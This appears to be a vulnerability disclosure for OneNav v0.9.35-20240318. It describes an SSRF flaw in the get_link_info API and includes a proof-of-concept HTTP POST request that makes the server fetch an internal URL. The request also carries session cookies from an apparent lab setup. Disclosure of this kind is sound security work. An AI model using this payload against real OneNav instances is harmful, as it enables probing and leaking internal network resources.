onenav
onenav copied to clipboard
OneNav v0.9.35-20240318 has SSRF vulnerability
Summary
OneNav v0.9.35-20240318 has SSRF vulnerability. After gaining the administrator permission, an attacker can obtain Intranet website information through the get_link_info interface. This vulnerability could allow an attacker to construct requests with dangerous features and cause the server side to initiate these dangerous network requests.
Details
Incoming links are not strictly checked for security, which may result in access to internal server resources. In addition, the administrator can obtain Intranet website information through the get_link_info interface. Such behavior may leak the internal information of the server.
Proof of Concept (POC)
POST /index.php?c=api&method=get_link_info HTTP/1.1
Host: 192.168.160.155:3080
Content-Length: 38
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.160.155:3080
Referer: http://192.168.160.155:3080/index.php?c=admin&page=edit_link_new&id=10
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID.dc7f2887=node01f1msvx64f4ns1skgll6ph75cu2.node0; key=b189bc601566e2c0190ea32a3ddd2d5b; PHPSESSID=4it3qber7hrftqqfrq4ccgbc8c; docs-theme-layout=light
Connection: close
url=http%3A%2F%2F192.168.160.155:10808